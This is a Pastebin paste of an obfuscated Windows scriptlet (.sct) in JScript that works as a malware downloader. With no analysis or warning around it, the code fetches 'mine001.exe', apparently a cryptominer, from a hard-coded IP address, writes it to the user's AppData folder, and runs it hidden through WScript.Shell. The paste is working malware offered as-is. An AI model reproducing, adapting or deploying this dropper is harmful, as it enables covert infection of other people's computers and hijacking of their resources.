Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <scriptlet>
- <registration
- description="DJvc.WRFN"
- progid="DJvc.WRFN"
- version="1"
- classid="{2d820bbe-27f3-4b4f-b13f-a02e01235209}"
- remotable="true"
- >
- </registration>
- <script language="JScript">
- <![CDATA[
- var SzA = ["WScript.Shell","Word.Application","ADODB.Stream","Scripting.FileSystemObject","http://192.189.25.17/hold/mine001.exe","mine001.exe","MSXML2.XMLHTTP"];
- var MZhNFjyj = XmjCSYX(0);
- mRioojVLeIcc= fsXGSqFmBVnmU("APPDATA") + "\\" + SzA[5];
- var YeTQgXBuaMnkQQ = XmjCSYX(3);
- try{
- var YeTQgXBuaMnkQQ = XmjCSYX(3);
- if (YeTQgXBuaMnkQQ.FileExists(mRioojVLeIcc)){
- YeTQgXBuaMnkQQ.DeleteFile(mRioojVLeIcc);
- }
- } catch (e) {
- }
- kITCbMeQMuhUePP(SzA[4],mRioojVLeIcc);
- MZhNFjyj.Run(mRioojVLeIcc, 0, false);
- function XmjCSYX(mRioojVLeIcc) {
- return new ActiveXObject(SzA[mRioojVLeIcc]);
- }
- function fsXGSqFmBVnmU(mRioojVLeIcc) {
- return MZhNFjyj.ExpandEnvironmentStrings("%" + mRioojVLeIcc + "%");
- }
- function kITCbMeQMuhUePP(xuibjYzhQqVMCMep, mRioojVLeIcc ) {
- var owCyXhujvqCZsGyWP = XmjCSYX(6);
- owCyXhujvqCZsGyWP.onreadystatechange=function() {
- if (owCyXhujvqCZsGyWP.readyState === 4) {
- var iVjFGNkdPORwjCelyYg = XmjCSYX(2);
- iVjFGNkdPORwjCelyYg.open();
- iVjFGNkdPORwjCelyYg.type = 1;
- iVjFGNkdPORwjCelyYg.write(owCyXhujvqCZsGyWP.ResponseBody);
- iVjFGNkdPORwjCelyYg.position = 0;
- iVjFGNkdPORwjCelyYg.saveToFile(mRioojVLeIcc, 2);
- iVjFGNkdPORwjCelyYg.close();
- }
- };
- owCyXhujvqCZsGyWP.open("GET", xuibjYzhQqVMCMep, false);
- owCyXhujvqCZsGyWP.send();
- }
- ]]>
- </script>
- </scriptlet>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
